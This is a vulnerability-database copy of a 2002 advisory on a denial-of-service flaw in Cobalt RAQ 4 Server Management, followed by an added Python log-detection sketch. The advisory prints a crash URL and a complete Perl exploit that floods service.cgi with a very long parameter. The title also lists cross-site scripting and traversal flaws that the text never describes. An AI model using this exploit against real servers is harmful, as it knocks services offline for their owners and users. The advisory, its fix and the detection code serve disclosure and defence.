A free, open vulnerability database that anyone can edit
INFO
------oOo----------------
Cobalt RAQ 4 Server Management,
Cross Site Scripting, Directory Traversal & DoS Vulnerabilities.
------oOo----------------

Company Affected: www.cobalt.com & www.sun.com
Version: RAQ 4 Server Management.
Download: http://www.cobalt.com/products/raq/index.html
OS Affected: Linux ALL, Solaris ALL.
Author:

** Alex Hernandez <email protected>
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.

----=Brief Description=------------

Denial Of service.

Proof Of concept:

Server crashes after sending a very long URL:

Example:

http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA...(Ax100000)...AAA

The system crashes and the admin needs to restart the service!

------oOo-------------
Exploit Code DoS Cobalt4_DoS.pl
------oOo-------------

#!/usr/bin/perl
#
# Simple script to send a long 'A's' command to the server,
# resulting in the server crashing.
#
# Cobalt RAQ DoS v4 proof-of-concept exploit.
# By Alex Hernandez <email protected> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.
#
#
# Usage: perl -x Cobalt4_DoS.pl -s <server>
#
# Example:
#
# perl -x Cobalt4_DoS.pl -s 10.0.0.1
#
# Crash was successful !
#

use Getopt::Std;
use IO::Socket;

print("\nCobalt RAQ DoS v4.0 DoS exploit (c)2002.\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

getopts('s:', \%args);
if(!defined($args{s})){&usage;}

($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);

$def = "A";
$num = "100000";
$data .= $def x $num;
$serv = $args{s};
$port = 81;#maybe u define the port for difference of versions
$buf = "GET /cgi-bin/.cobalt/alert/service.cgi?service=$data /HTTP/1.0\r\n\r\n";

$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";

print("\nCrash was successful !\n\n");

sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");}

------oOo------------------------------------

Vendor Response:

The vendor was notified
Posted List's Security cobalt:
email protected & email protected
http://www.cobalt.com

Patch Temporary:

Delete the CGI files from the system, or disable their execution.

Alex Hernandez <email protected> (c) 2002.

------oOo------------------------------------
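Detection sketch for the request pattern the advisory describes, added here as an example and not part of the original advisory or of any vendor code. It flags access-log entries whose service= parameter to service.cgi is overlong; the Apache common log format, the 256-character threshold, the function name and the sample log lines are all assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path taken from the advisory; the length limit is an assumed threshold.
TARGET_PATH = "/cgi-bin/.cobalt/alert/service.cgi"
MAX_SERVICE_LEN = 256

# Assumed Apache common log format: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}|-) '
)

def suspicious_requests(lines, max_len=MAX_SERVICE_LEN):
    """Return (host, time, length) for each overlong service= value sent to service.cgi."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = m.group("request").split(" ")
        if len(parts) < 2:
            continue
        url = urlsplit(parts[1])  # parts[1] is the request target
        if url.path != TARGET_PATH:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("service", []):
            if len(value) > max_len:
                hits.append((m.group("host"), m.group("time"), len(value)))
    return hits

# Constructed sample log lines (documentation addresses, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2002:10:00:00 +0000] '
    '"GET /cgi-bin/.cobalt/alert/service.cgi?service=web HTTP/1.0" 200 512',
    '192.0.2.66 - - [01/Jan/2002:10:00:05 +0000] '
    '"GET /cgi-bin/.cobalt/alert/service.cgi?service=' + "A" * 100000 + ' /HTTP/1.0" 400 0',
    '192.0.2.20 - - [01/Jan/2002:10:00:09 +0000] '
    '"GET /index.html?service=' + "A" * 5000 + ' HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for host, when, length in suspicious_requests(SAMPLE_LOG):
        print(f"{when} {host} sent service= value of {length} characters")
```

The same length limit can be enforced in front of the CGI (for example at a reverse proxy) as a stopgap alongside the advisory's temporary fix of removing or disabling the CGI files.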